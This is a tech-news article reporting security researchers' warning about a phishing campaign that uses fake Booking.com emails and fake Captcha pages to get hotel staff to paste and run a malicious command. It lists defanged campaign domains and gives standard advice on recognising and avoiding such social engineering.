Hackers using fake Booking.com site to target the hospitality industry, security researchers warn
- Marijan Hassan - Tech Journalist
- 5 days ago
- 2 min read
Updated: 4 days ago
Security researchers at Malwarebytes are raising the alarm about a new phishing campaign that leverages the well-known Booking.com brand to target hotels, potentially compromising sensitive guest data. Cybercriminals are employing sophisticated tactics, including fake Captcha websites, to trick hotel staff into infecting their systems with malware.
How it works
The attack begins with a deceptive email, seemingly sent from Booking.com, urging hotel staff to confirm a booking.
At this point, the website has already secretly loaded a malicious MSHTA command into the user's computer clipboard. Then, when the user ticks the Captcha checkbox, they are prompted to complete a series of "Verification Steps."
These instructions are the core of the deception, as they guide the victim to paste the copied malicious command directly into a Windows command prompt and execute it.
Running this command triggers an attack chain that downloads and executes a remote file, ultimately leading to the hotel's systems being infected with a Trojan. A successful compromise of a hotel network can be a lucrative target for cybercriminals, granting them access to valuable payment details and other personal information of guests, which can then be exploited or sold on the dark web.
Malwarebytes has identified the following domains associated with this ongoing campaign:
Vencys[.]com - Appears in the initial phishing email and redirects to the fake Captcha site
Bokcentrpart[.]com - Hosts the deceptive fake Captcha website
captpart[.]info The server from which the malicious malware is downloaded
Protection and mitigation
To protect themselves and their customers, hotels and individuals should remain vigilant and adopt the following security practices:
Be wary of urgent emails: Never blindly trust emails that demand immediate action. If Booking.com genuinely needs confirmation, log in to the platform directly through the official website or app.
Verify the sender's domain: Always scrutinize the sender's email address. Legitimate emails from Booking.com will originate from the official booking.com domain.
Avoid clicking suspicious links: Exercise caution when clicking on links in emails, especially if they ask for verification or sensitive information.
Never run copied commands without understanding: Be extremely cautious about pasting and executing commands in the Windows command prompt, especially if instructed to do so by an email or website.
Implement security training: Hotels should provide comprehensive security awareness training to their staff to help them recognize and avoid social engineering attacks like this.
